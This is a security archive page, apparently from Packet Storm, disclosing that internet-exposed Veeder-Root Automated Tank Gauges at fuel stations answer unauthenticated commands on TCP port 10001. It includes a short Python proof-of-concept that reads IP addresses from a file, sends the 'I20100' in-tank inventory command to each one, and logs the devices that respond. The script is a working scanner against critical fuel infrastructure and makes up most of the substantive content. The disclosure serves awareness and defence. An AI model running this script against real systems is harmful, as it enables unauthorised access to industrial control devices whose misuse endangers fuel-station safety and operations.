Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Automated Tank Gauge (ATG) Remote Configuration Disclosure[6]
- Authored by RoseSecurity[7]
-
In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 gas station Automated Tank Gauges (ATGs) which were publicly accessible. Besides monitoring for leakage, these systems are also instrumental in gauging fluid levels, tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are utilized by nearly every fueling station in the United States and tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators will commonly configure the ATG serial interface to an internet-facing TCP port (generally set to TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.
- SHA-256 |
1222ef3166eddf3e2b1283c72bc5f78616ec813de663f9a776c261eacba66ccf
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/env python3
import time
import socket
with open("/tmp/ATG_SCAN.txt",'r') as atg_file:
for line in atg_file.read().splitlines():
try:
atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10001
search_str = 'IN-TANK INVENTORY'
msg = str('\x01' + 'I20100' + '\n').encode('ascii')
atg_socket.connect((line, port))
atg_socket.send(msg)
time.sleep(.25)
response = atg_socket.recv(1024).decode()
if search_str in response:
with open("/tmp/ATG_DEVICES.txt", 'a') as file2:
file2.write(line + "\t ->\tATG Device\n")
else:
continue
atg_socket.close()
except:
pass
atg_file.close()
File Tags
- ActiveX[17] (932)
- Advisory[18] (79,323)
- Arbitrary[19] (15,602)
- BBS[20] (2,859)
- Bypass[21] (1,609)
- CGI[22] (1,015)
- Code Execution[23] (6,870)
- Conference[24] (672)
- Cracker[25] (840)
- CSRF[26] (3,282)
- DoS[27] (22,457)
- Encryption[28] (2,348)
- Exploit[29] (50,236)
- File Inclusion[30] (4,161)
- File Upload[31] (945)
- Firewall[32] (821)
- Info Disclosure[33] (2,649)
- Intrusion Detection[34] (863)
- Java[35] (2,884)
- JavaScript[36] (814)
- Kernel[37] (6,232)
- Local[38] (14,153)
- Magazine[39] (586)
- Overflow[40] (12,349)
- Perl[41] (1,417)
- PHP[42] (5,078)
- Proof of Concept[43] (2,287)
- Protocol[44] (3,413)
- Python[45] (1,440)
- Remote[46] (29,971)
- Root[47] (3,492)
- Ruby[48] (594)
- Scanner[49] (1,631)
- Security Tool[50] (7,760)
- Shell[51] (3,097)
- Shellcode[52] (1,204)
- Sniffer[53] (885)
- Spoof[54] (2,160)
- SQL Injection[55] (16,081)
- TCP[56] (2,375)
- Trojan[57] (682)
- UDP[58] (874)
- Virus[59] (660)
- Vulnerability[60] (31,024)
- Web[61] (9,292)
- Whitepaper[62] (3,724)
- x86[63] (944)
- XSS[64] (17,461)
- Other[65]
File Archives
- November 2022[66]
- October 2022[67]
- September 2022[68]
- August 2022[69]
- July 2022[70]
- June 2022[71]
- May 2022[72]
- April 2022[73]
- March 2022[74]
- February 2022[75]
- January 2022[76]
- December 2021[77]
- Older[78]
Systems
- AIX[79] (426)
- Apple[80] (1,923)
- BSD[81] (369)
- CentOS[82] (55)
- Cisco[83] (1,916)
- Debian[84] (6,601)
- Fedora[85] (1,690)
- FreeBSD[86] (1,242)
- Gentoo[87] (4,262)
- HPUX[88] (878)
- iOS[89] (329)
- iPhone[90] (108)
- IRIX[91] (220)
- Juniper[92] (67)
- Linux[93] (43,888)
- Mac OS X[94] (684)
- Mandriva[95] (3,105)
- NetBSD[96] (255)
- OpenBSD[97] (479)
- RedHat[98] (12,183)
- Slackware[99] (941)
- Solaris[100] (1,607)
- SUSE[101] (1,444)
- Ubuntu[102] (8,103)
- UNIX[103] (9,140)
- UnixWare[104] (185)
- Windows[105] (6,491)
- Other[106]
